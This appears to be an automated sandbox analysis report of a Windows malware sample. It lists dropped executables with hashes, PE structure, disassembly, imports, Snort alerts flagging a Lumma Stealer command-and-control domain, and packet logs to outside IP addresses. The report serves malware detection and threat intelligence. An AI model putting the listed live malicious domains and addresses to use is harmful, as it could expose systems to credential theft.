                              C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):108216
                              Entropy (8bit):4.007888748845782
                              Encrypted:false
                              SSDEEP:1536:zdkRzWrJvzEIhGiwGGn7amF8iKl8i4l+a:zdkRzWrJvzNhGi3mF8FxO
                              MD5:62E9D97E0DE0D2D763BAD04EDEF64BB9
                              SHA1:5C419CAC2BE8F3E83EBD6882316DF811BCEA21F5
                              SHA-256:D3FBA6D1568A38D078B58E3DAFE3BF99EF6B9D43E9A2F75FF7E7D6E0DBE5C7D2
                              SHA-512:322B54DAAE59E4F5C831F728C0E1688C1C27AF73E923747A15D895F0752F48516743395D5F53AB35B6ED660944C0CB19C7EE6D517F209363C7BF8629A45454C9
                              Malicious:false
                              Reputation:low
                              Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[4].json

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):713
                              Entropy (8bit):5.159635906901548
                              Encrypted:false
                              SSDEEP:12:YWgc2TCEoP8H+OEoPgVqmXYH+2yrZMAdrKC8K/y8kEUq1HLxycXNNZ/TCB893c3Z:Yzc2TdoP8HGoPIYHt0drc6UE14
                              MD5:8B2D275E059209BCEF78A5BEDA36CCAF
                              SHA1:EC08095527FE2B9DC56DEBE2020542F56A53C18A
                              SHA-256:048F7FC33851ADCB0C44BCE2EFFBDEDD8CA5EE4DE6BA0C746321C91097721F55
                              SHA-512:F5899D076542496AEFD1E0A86D99D02906E5770B4340823D5B62666EB95337FEE7C3D298BFA24FC4787F49A829BECB5CE4B8EC9EFE5B185364ADF1F3E6D149E5
                              Malicious:false
                              Reputation:low
                              Preview:{"serviceContext":{"serviceActivityId":"6688c54d-3ca7-4c2b-b2a1-9900f6d48e45","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"6688c54d-3ca7-4c2b-b2a1-9900f6d48e45|2024-07-06T04:17:17.6941816Z|fabric_msn|ESU|News_338"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

                              C:\Users\user\AppData\Local\Temp\8FDD.exe

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):6642176
                              Entropy (8bit):7.866419732571782
                              Encrypted:false
                              SSDEEP:98304:LqhZ67opwYckx35SF2XKgxVvHuCPU8GSbO3JAXV1LrA+ZlL9CxpzTp2:LgErupSgKORuCT43JeV1LE+/s3p
                              MD5:BD2EAC64CBDED877608468D86786594A
                              SHA1:778AD44AFD5629F0A5B3B7DF9D6F02522AE94D91
                              SHA-256:CAE992788853230AF91501546F6EAD07CFD767CB8429C98A273093A90BBCB5AD
                              SHA-512:3C8F43045F27ADDCB5FB23807C2CE1D3F247CC30DD1596134A141B0BBC7FA4D30D138791214D939DC4F34FD925B9EC450EA340E5871E2F4F64844226ED394312
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Joe Sandbox View:
                              • Filename: file.exe, Detection: malicious, Browse
                              • Filename: file.exe, Detection: malicious, Browse
                              • Filename: file.exe, Detection: malicious, Browse
                              • Filename: file.exe, Detection: malicious, Browse
                              • Filename: 5GOuTtZoQn.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exe, Detection: malicious, Browse
                              • Filename: JuHVfiAuLo.exe, Detection: malicious, Browse
                              • Filename: LXbM8RbhLa.exe, Detection: malicious, Browse
                              • Filename: EiPVv5yELP.exe, Detection: malicious, Browse
                              • Filename: 6IMo1kM9CC.exe, Detection: malicious, Browse
                              Reputation:moderate, very likely benign file
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....U~f..............................M...........@...................................e...@..................................O......P......................@.......................................................@3..............................text...+........................... ..`.rdata...*..........................@..@.data.... ..........................@....vmpL.p.....0...................... ..`.vmpL.p@....@3.....................@....vmpL.p..]..P3...]................. ..`.reloc.......@........].............@..@.rsrc.......P...f....].............@..@........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\crwjtgt

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):236032
                              Entropy (8bit):6.316603530644319
                              Encrypted:false
                              SSDEEP:3072:IovqqnT/W562w1DOeZPK5gGw++afPQRMZIa/nobS0xmv/0X4KEHsy4iIT:IIqqnC56li/JfPQRmnoro33KEHW
                              MD5:0FC784B6C538E7C4A5A4F4BCD8068859
                              SHA1:8340C0914EC651C3E4FFC7682162154505FC5F8A
                              SHA-256:77BA6812B4E9223398D31476512A19CE12C60CF8C9D139E4578F3F19563E0D52
                              SHA-512:EAEAF7633B5ACC64D95D2691EF0952EA691634591DFE30E61CA2116268F007EF676507A5D67ACF5265ED8308622915E1704452A59699F4BE162AB9D49AA3818C
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............yB.yB.yB...B.yB...B.yB...B..yB...B.yB.xB..yB...B.yB...B.yB...B.yBRich.yB................PE..L...].7d.....................P@.....h%....... ....@...........................B.............................................<I.......`A.x............................I...............................D..@............ ...............................text............................... ..`.rdata..d2... ...4..................@..@.data.....>..`.......:..............@....rsrc...x....`A.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\crwjtgt:Zone.Identifier

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.316603530644319
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:236'032 bytes
                              MD5:0fc784b6c538e7c4a5a4f4bcd8068859
                              SHA1:8340c0914ec651c3e4ffc7682162154505fc5f8a
                              SHA256:77ba6812b4e9223398d31476512a19ce12c60cf8c9d139e4578f3f19563e0d52
                              SHA512:eaeaf7633b5acc64d95d2691ef0952ea691634591dfe30e61ca2116268f007ef676507a5d67acf5265ed8308622915e1704452a59699f4be162ab9d49aa3818c
                              SSDEEP:3072:IovqqnT/W562w1DOeZPK5gGw++afPQRMZIa/nobS0xmv/0X4KEHsy4iIT:IIqqnC56li/JfPQRmnoro33KEHW
                              TLSH:0234CF20B1E19072D567453689E1FEE4DA7EBC52B7F1824F27B8163E2EB07C0867531A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............yB..yB..yB...B..yB...B..yB...B..yB...B..yB..xB..yB...B..yB...B..yB...B..yBRich..yB................PE..L...].7d...........

                              File Icon

                              Icon Hash:63796de971436e0f

                              Static PE Info

                              General

                              Entrypoint:0x402568
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x6437025D [Wed Apr 12 19:11:25 2023 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:48bfd2c8ba2c8c1adc16449871b198d1

                              Entrypoint Preview

                              Instruction
                              call 00007FF3489096A7h
                              jmp 00007FF34890690Eh
                              push edi
                              mov eax, esi
                              and eax, 0Fh
                              test eax, eax
                              jne 00007FF348906B47h
                              mov edx, ecx
                              and ecx, 7Fh
                              shr edx, 07h
                              je 00007FF348906AE7h
                              jmp 00007FF348906A88h
                              lea ebx, dword ptr [ebx+00000000h]
                              movdqa xmm0, dqword ptr [esi]
                              movdqa xmm1, dqword ptr [esi+10h]
                              movdqa xmm2, dqword ptr [esi+20h]
                              movdqa xmm3, dqword ptr [esi+30h]
                              movdqa dqword ptr [edi], xmm0
                              movdqa dqword ptr [edi+10h], xmm1
                              movdqa dqword ptr [edi+20h], xmm2
                              movdqa dqword ptr [edi+30h], xmm3
                              movdqa xmm4, dqword ptr [esi+40h]
                              movdqa xmm5, dqword ptr [esi+50h]
                              movdqa xmm6, dqword ptr [esi+60h]
                              movdqa xmm7, dqword ptr [esi+70h]
                              movdqa dqword ptr [edi+40h], xmm4
                              movdqa dqword ptr [edi+50h], xmm5
                              movdqa dqword ptr [edi+60h], xmm6
                              movdqa dqword ptr [edi+70h], xmm7
                              lea esi, dword ptr [esi+00000080h]
                              lea edi, dword ptr [edi+00000080h]
                              dec edx
                              jne 00007FF348906A25h
                              test ecx, ecx
                              je 00007FF348906ACBh
                              mov edx, ecx
                              shr edx, 04h
                              test edx, edx
                              je 00007FF348906A99h
                              lea ebx, dword ptr [ebx+00000000h]
                              movdqa xmm0, dqword ptr [esi]
                              movdqa dqword ptr [edi], xmm0
                              lea esi, dword ptr [esi+10h]
                              lea edi, dword ptr [edi+10h]
                              dec edx
                              jne 00007FF348906A71h
                              and ecx, 0Fh
                              je 00007FF348906AA6h
                              mov eax, ecx
                              shr ecx, 02h
                              je 00007FF348906A8Fh
                              mov edx, dword ptr [esi]
                              mov dword ptr [edi], edx
                              lea esi, dword ptr [esi+04h]
                              lea edi, dword ptr [edi+04h]
                              dec ecx
                              jne 00007FF348906A75h
                              mov ecx, eax
                              and ecx, 00000000h

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [IMP] VS2008 SP1 build 30729
                              • [RES] VS2010 build 30319
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2493c0xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24160000xaa78.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x249dc0x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x244000x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x220000x188.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x200b00x20200a532ac2b7ac390806eeaba7b1013ad2dFalse0.8539564080739299data7.709343986759736IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x220000x32640x3400629a9edf244cd47dc3765fac1be4e01bFalse0.3524639423076923data4.864183117011733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x260000x23efea00xb400ef8aab404f7870823f373fe813e93d36unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24160000xaa780xac00ccb0bbee6d7388be257b959563d39d86False0.5307276526162791data5.452540860805502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x24163a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0JapaneseJapan0.533410138248848
                              RT_ICON0x2416a680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0JapaneseJapan0.41462655601659754
                              RT_ICON0x24190100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0JapaneseJapan0.450354609929078
                              RT_ICON0x24194a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsJapaneseJapan0.3997867803837953
                              RT_ICON0x241a3500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsJapaneseJapan0.5816787003610109
                              RT_ICON0x241abf80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsJapaneseJapan0.646889400921659
                              RT_ICON0x241b2c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsJapaneseJapan0.661849710982659
                              RT_ICON0x241b8280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600JapaneseJapan0.5451244813278008
                              RT_ICON0x241ddd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224JapaneseJapan0.5970919324577861
                              RT_ICON0x241ee780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400JapaneseJapan0.5713114754098361
                              RT_ICON0x241f8000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088JapaneseJapan0.650709219858156
                              RT_STRING0x241ff680x6c0dataJapaneseJapan0.42476851851851855
                              RT_STRING0x24206280x23aMatlab v4 mat-file (little endian) , numeric, rows 0, columns 0JapaneseJapan0.48947368421052634
                              RT_STRING0x24208680x20edataJapaneseJapan0.5057034220532319
                              RT_GROUP_ICON0x24194780x30dataJapaneseJapan0.9375
                              RT_GROUP_ICON0x241fc680x76dataJapaneseJapan0.6694915254237288
                              RT_VERSION0x241fce00x284data0.5232919254658385

                              Imports

                              DLLImport
                              KERNEL32.dllGetConsoleAliasesLengthW, SetEndOfFile, FindResourceW, CreateDirectoryW, WriteConsoleInputA, VirtualFree, GetWindowsDirectoryA, LoadLibraryW, ReplaceFileW, GetModuleFileNameW, GlobalUnlock, SetLastError, GetProcAddress, LoadLibraryA, IsBadStringPtrW, GlobalGetAtomNameW, EnumResourceTypesW, GetOEMCP, CancelIo, OpenFileMappingW, GetWindowsDirectoryW, RtlUnwind, Sleep, GetStringTypeW, LCMapStringW, RemoveVectoredExceptionHandler, FindResourceA, CreateFileA, LocalAlloc, GetDateFormatW, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, RaiseException, HeapCreate, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, EncodePointer, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, SetUnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, UnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapSize
                              USER32.dllInsertMenuItemW, GetKeyboardLayoutNameW, GetCaretPos, SetMessageExtraInfo, CharUpperBuffW, DdeKeepStringHandle, GetClassInfoW
                              GDI32.dllGetCharWidthW
                              ADVAPI32.dllCopySid, BackupEventLogW
                              SHELL32.dllFindExecutableA
                              ole32.dllCoRevokeClassObject, CoMarshalHresult
                              WINHTTP.dllWinHttpWriteData

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              JapaneseJapan

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              07/06/24-06:16:38.176260TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49743443192.168.2.4188.114.97.3
                              07/06/24-06:16:45.926836TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49752443192.168.2.4188.114.97.3
                              07/06/24-06:16:50.213157TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49758443192.168.2.4188.114.97.3
                              07/06/24-06:16:38.140129UDP2054184ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (foodypannyjsud .shop)5552353192.168.2.41.1.1.1
                              07/06/24-06:16:43.790837TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49750443192.168.2.4188.114.97.3
                              07/06/24-06:16:42.679399TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49749443192.168.2.4188.114.97.3
                              07/06/24-06:16:39.810313TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49745443192.168.2.4188.114.97.3
                              07/06/24-06:16:47.352529TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49754443192.168.2.4188.114.97.3
                              07/06/24-06:16:41.209865TCP2054185ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI)49747443192.168.2.4188.114.97.3

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 6, 2024 06:16:24.616158009 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:24.620959044 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:24.621031046 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:24.621176004 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:24.621190071 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:24.625920057 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:24.626022100 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.106266975 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.106511116 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.106570959 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.107635021 CEST4973780192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.112412930 CEST804973758.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.114490032 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.119309902 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.119380951 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.119513988 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.119541883 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:26.124257088 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:26.124267101 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.691529989 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.691903114 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.691971064 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.692025900 CEST4973880192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.695086956 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.696785927 CEST804973858.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.699878931 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.699944973 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.700069904 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.700084925 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:27.704772949 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:27.705132961 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.169231892 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.169379950 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.169568062 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.169568062 CEST4973980192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.172657013 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.174340010 CEST804973958.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.177402973 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.177469015 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.177573919 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.177587032 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:29.182291985 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:29.182442904 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:30.690959930 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:30.691020966 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:30.691082001 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:30.691240072 CEST4974080192.168.2.458.151.148.90
                              Jul 6, 2024 06:16:30.695967913 CEST804974058.151.148.90192.168.2.4
                              Jul 6, 2024 06:16:30.729561090 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:30.729587078 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:30.729768991 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:30.729980946 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:30.729995012 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:31.564043999 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:31.564197063 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:31.569152117 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:31.569164038 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:31.569365978 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:31.582820892 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:31.628506899 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.040369987 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.087096930 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.211741924 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211752892 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211785078 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211795092 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211821079 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211828947 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.211837053 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.211863995 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.211863995 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.211875916 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.215307951 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.215323925 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.215374947 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.215383053 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.215470076 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.383318901 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.383347034 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.383410931 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.383426905 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.383439064 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.383481979 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.386312008 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.386327982 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.386404037 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.386410952 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.386563063 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.390716076 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.390732050 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.390831947 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.390840054 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.390893936 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.396209955 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.396224976 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.396404982 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.396411896 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.396476984 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.554905891 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.554929018 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.555125952 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.555139065 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.555283070 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.558398008 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.558413029 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.558485031 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.558491945 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.558548927 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.561959982 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.561975956 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.562057972 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.562062979 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.562139988 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.565509081 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.565525055 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.565583944 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.565589905 CEST44349741185.149.100.242192.168.2.4
                              Jul 6, 2024 06:16:32.565654039 CEST49741443192.168.2.4185.149.100.242
                              Jul 6, 2024 06:16:32.567418098 CEST44349741185.149.100.242192.168.2.4
